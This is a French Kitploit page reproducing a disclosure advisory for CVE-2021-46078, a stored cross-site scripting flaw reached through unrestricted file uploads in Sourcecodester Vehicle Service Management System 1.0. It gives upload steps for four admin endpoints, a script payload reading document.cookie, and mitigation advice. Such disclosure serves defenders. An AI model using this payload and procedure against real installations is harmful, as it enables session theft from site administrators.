Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Vehicle-Service-Management-System-Multiple-File-upload-Leads-to-Stored-Cross-Site-Scripting — CVE-2021-46078 - Une vulnérabilité de téléversement de fichier sans restriction existe dans Sourcecodester Vehicle Service Management System 1.0. Un attaquant distant peut téléverser des fichiers malveillants, conduisant à une vulnérabilité de script intersites stocké (Cross-Site Scripting). | Kitploit
Outils/GitHubGitHub/sanupl/vehicle-service-management-system-multiple-file-upload-leads-to-stored-cross-site-scripting
Analyse des VulnérabilitésExploitationExploitation d'Applications WebSécurité WebTests d'IntrusionApprentissage et Éducation
GitHubsanupl/vehicle-service-management-system-multiple-file-upload-leads-to-stored-cross-site-scripting

Vehicle-Service-Management-System-Multiple-File-upload-Leads-to-Stored-Cross-Site-Scripting

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Voir le dépôt
il y a 3 moisPas encore vérifié

À propos

CVE-2021-46078 - Une vulnérabilité de téléversement de fichier sans restriction existe dans Sourcecodester Vehicle Service Management System 1.0. Un attaquant distant peut téléverser des fichiers malveillants, conduisant à une vulnérabilité de script intersites stocké (Cross-Site Scripting).

Partager

CVE-2021-46078

Titre de l'exploit : Vehicle Service Management System - Le téléchargement de 'plusieurs' fichiers conduit à un Cross-Site Scripting stocké

Auteur de l'exploit : SANU P.L

CVE : CVE-2021-46078

CVSS : 4.8 MOYEN

Références :

  • https://www.plsanu.com/vehicle-service-management-system-multiple-file-upload-leads-to-stored-cross-site-scripting
  • https://nvd.nist.gov/vuln/detail/CVE-2021-46078
  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-46078

Description :

Une vulnérabilité de téléchargement de fichier sans restriction existe dans Sourcecodester Vehicle Service Management System 1.0. Un attaquant distant peut télécharger des fichiers malveillants conduisant à une vulnérabilité de Cross-Site Scripting stocké.

1. Vehicle Service Management System - 'MyAccount' (/admin/?page=user)

Exploit :

  1. Connectez-vous au panneau d'administration http://localhost/vehicle_service/admin
  2. Accédez à la section My Account http://localhost/vehicle_service/admin/?page=user

Payload :

root@kitploit:~
<!DOCTYPE html>
<html>
<title>Stored XSS</title>
<body>
<script>
alert(document.cookie);
</script>
</body>
</html>
  1. Enregistrez le code html ci-dessus, par ex. XSS.html
  2. Dans la section My Account, saisissez tous les détails requis et parcourez le fichier html dans Avatar.
  3. Cliquez sur le bouton update.
  4. Ouvrez l'image de l'avatar dans un nouvel onglet.
  5. Le code javascript malveillant est déclenché.

2. Vehicle Service Management System - 'User List' (/admin/?page=user/manage_user)

Exploit :

  1. Connectez-vous au panneau d'administration http://localhost/vehicle_service/admin
  2. Accédez à la section User List et cliquez sur le bouton Create New.

Payload :

root@kitploit:~
<!DOCTYPE html>
<html>
<title>Stored XSS</title>
<body>
<script>
alert(document.cookie);
</script>
</body>
</html>
  1. Enregistrez le code html ci-dessus, par ex. XSS.html
  2. Dans la page Create New User, saisissez tous les détails requis et parcourez le fichier html dans Avatar.
  3. Cliquez sur le bouton Save.
  4. Ouvrez l'image de l'avatar dans un nouvel onglet.
  5. Le code javascript malveillant est déclenché.

3. Vehicle Service Management System - 'Settings-System Logo' (/admin/?page=system_info)

Exploit :

  1. Connectez-vous au panneau d'administration http://localhost/vehicle_service/admin
  2. Accédez à la section Settings http://localhost/vehicle_service/admin/?page=system_info

Payload :

root@kitploit:~
<!DOCTYPE html>
<html>
<title>Stored XSS</title>
<body>
<script>
alert(document.cookie);
</script>
</body>
</html>
  1. Enregistrez le code html ci-dessus, par ex. XSS.html
  2. Dans la section Settings, saisissez tous les détails requis et parcourez le fichier html dans System Logo.
  3. Cliquez sur le bouton update.
  4. Ouvrez l'image du System Logo dans un nouvel onglet.
  5. Le code javascript malveillant est déclenché.

4. Vehicle Service Management System - 'Settings-Website Cover' (/admin/?page=system_info)

Exploit :

  1. Connectez-vous au panneau d'administration http://localhost/vehicle_service/admin
  2. Accédez à la section Settings http://localhost/vehicle_service/admin/?page=system_info

Payload :

root@kitploit:~
<!DOCTYPE html>
<html>
<title>Stored XSS</title>
<body>
<script>
alert(document.cookie);
</script>
</body>
</html>
  1. Enregistrez le code html ci-dessus, par ex. XSS.html
  2. Dans la section Settings, saisissez tous les détails requis et parcourez le fichier html dans Website Cover.
  3. Cliquez sur le bouton update.
  4. Ouvrez l'image du Website Cover dans un nouvel onglet.
  5. Le code javascript malveillant est déclenché.

Impact :

Un attaquant peut télécharger un fichier malveillant sur plusieurs points de terminaison, ce qui conduit à un Cross-Site Scripting stocké.

Atténuation :

Il est recommandé de mettre en œuvre les mesures suivantes :

  • N'accepter jamais un nom de fichier et son extension directement sans disposer d'un filtre de liste blanche.
  • S'il n'est pas nécessaire d'avoir des caractères Unicode, il est fortement recommandé de n'accepter que des caractères alphanumériques et un seul point comme entrée pour le nom du fichier et l'extension.
  • Limiter la taille du fichier à une valeur maximale afin d'empêcher les attaques par déni de service.
  • Le répertoire de téléchargement ne doit pas avoir de permission "execute".
  • Ne pas se fier uniquement à la validation côté client.
Télécharger l’outil